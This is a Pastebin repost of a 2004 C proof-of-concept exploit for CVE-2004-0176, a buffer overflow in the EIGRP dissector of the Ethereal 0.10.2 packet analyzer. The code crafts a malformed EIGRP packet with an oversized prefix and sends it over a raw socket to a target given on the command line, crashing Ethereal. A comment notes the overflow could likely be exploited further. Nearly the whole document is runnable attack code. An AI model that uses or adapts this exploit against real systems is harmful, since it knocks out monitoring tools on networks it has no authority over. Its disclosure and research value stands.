Advertisement
FlyFar

Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service - CVE-2004-0176

Apr 12th, 2024
708
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.77 KB | Cybersecurity | 0 0
  1. /*
  2.  * Ethereal network protocol analyzer
  3.  * EIGRP Dissector TLV_IP_INT Long IP Address Overflow
  4.  * vulnerability
  5.  * proof of concept code
  6.  * version 1.0 (Mar 26 2004)
  7.  *
  8.  * by R&#65533;mi Denis-Courmont < ethereal at simphalampin dot com >
  9.  *   www simphalempin com dev
  10.  *
  11.  * This vulnerability was found by:
  12.  *   Stefan Esser s.esser e-matters de
  13.  * whose original advisory may be fetched from:
  14.  *   security e-matters de advisories 032004.html
  15.  *
  16.  * Vulnerable:
  17.  *  - Ethereal v0.10.2
  18.  *
  19.  * Not vulnerable:
  20.  *  - Ethreal v0.10.3
  21.  *
  22.  * Note: this code will simply trigger a denial of service on Ethereal.
  23.  * It should really be possible to exploit the buffer overflow
  24.  * (apparently up to 29 bytes overflow), but I haven't tried.
  25.  */
  26.  
  27.  
  28. #include <string.h>
  29. #include <stdio.h>
  30.  
  31. #include <sys/types.h>
  32. #include <unistd.h>
  33. #include <sys/socket.h>
  34. #include <netinet/ip.h>
  35. #include <netdb.h>
  36.  
  37. static const char packet[] =
  38.         "\x01" /* Version */
  39.         "\x04" /* Opcode: Reply */
  40.         "\x00\x00" /* Checksum (invalid) */
  41.         "\x00\x00\x00\x00" /* Flags */
  42.         "\x00\x00\x00\x00" /* Sequence number */
  43.         "\x00\x00\x00\x00" /* ACK */
  44.         "\x00\x00\x00\x00" /* AS number */
  45.  
  46.         /* IP internal routes TLV */
  47.         "\x01\x02" /* Type */
  48.         "\x00\x39" /* Length (should be 0x1C) */
  49.         "\x00\x00\x00\x00" /* Next hop */
  50.         "\x00\x00\x00\x00" /* Delay */
  51.         "\x00\x00\x00\x00" /* Bandwitdh */
  52.         "\x00\x00\x00" /* MTU */
  53.         "\x00" /* Hop count: directly connected */
  54.         "\xff" /* Reliability: maximum */
  55.         "\x01" /* Load: minimum */
  56.         "\x00\x00" /* Reserved */
  57.         "\xff" /* Prefix length: should be > 0 and <= 32 */
  58.         "\x00\x00\x00" /* Destination network */
  59.         "\xff\xff\xff\xff" "\xff\xff\xff\xff"
  60.         "\xff\xff\xff\xff" "\xff\xff\xff\xff"
  61.         "\xff\xff\xff\xff" "\xff\xff\xff\xff"
  62.         "\xff\xff\xff\xff" "\xff" /* buffer overflow */
  63. ;
  64.  
  65.  
  66. static int
  67. proof (const struct sockaddr_in *dest)
  68. {
  69.         int fd;
  70.         size_t len;
  71.  
  72.         fd = socket (PF_INET, SOCK_RAW, 88);
  73.         if (fd == -1)
  74.         {
  75.                 perror ("Raw socket error");
  76.                 return 1;
  77.         }
  78.  
  79.         len = sizeof (packet) - 1;
  80.         if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
  81.                         sizeof (struct sockaddr_in)) != len)
  82.         {
  83.                 perror ("Packet sending error");
  84.                 close (fd);
  85.                 return 1;
  86.         }
  87.  
  88.         puts ("Packet sent!");
  89.         close (fd);
  90.         return 0;
  91. }
  92.  
  93.  
  94. static int
  95. usage (const char *path)
  96. {
  97.         fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
  98.         return 2;
  99. }
  100.  
  101.  
  102. int
  103. main (int argc, char *argv[])
  104. {
  105.         struct sockaddr *dest;
  106.  
  107.         puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflow\n"
  108.                 "proof of concept code\n"
  109.                 "Copyright (C) 2004 R<E9>mi Denis-Courmont "
  110.                 "<\x65\x74\x68\x65\x72\x65\x61\x6c\x40\x73\x69\x6d\x70"
  111.                 "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");
  112.  
  113.  
  114.         if (argc != 2)
  115.                 return usage (argv[0]);
  116.         else
  117.         {
  118.                 struct addrinfo help, *res;
  119.                 int check;
  120.  
  121.                 memset (&help, 0, sizeof (help));
  122.                 help.ai_family = PF_INET;
  123.  
  124.                 check = getaddrinfo (argv[1], NULL, &help, &res);
  125.                 if (check)
  126.                 {
  127.                         fprintf (stderr, "%s: %s\n", argv[1],
  128.                                         gai_strerror (check));
  129.                         return 1;
  130.                 }
  131.  
  132.                 dest = res->ai_addr;
  133.         }
  134.  
  135.         return proof ((const struct sockaddr_in *)dest);
  136. }
  137.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement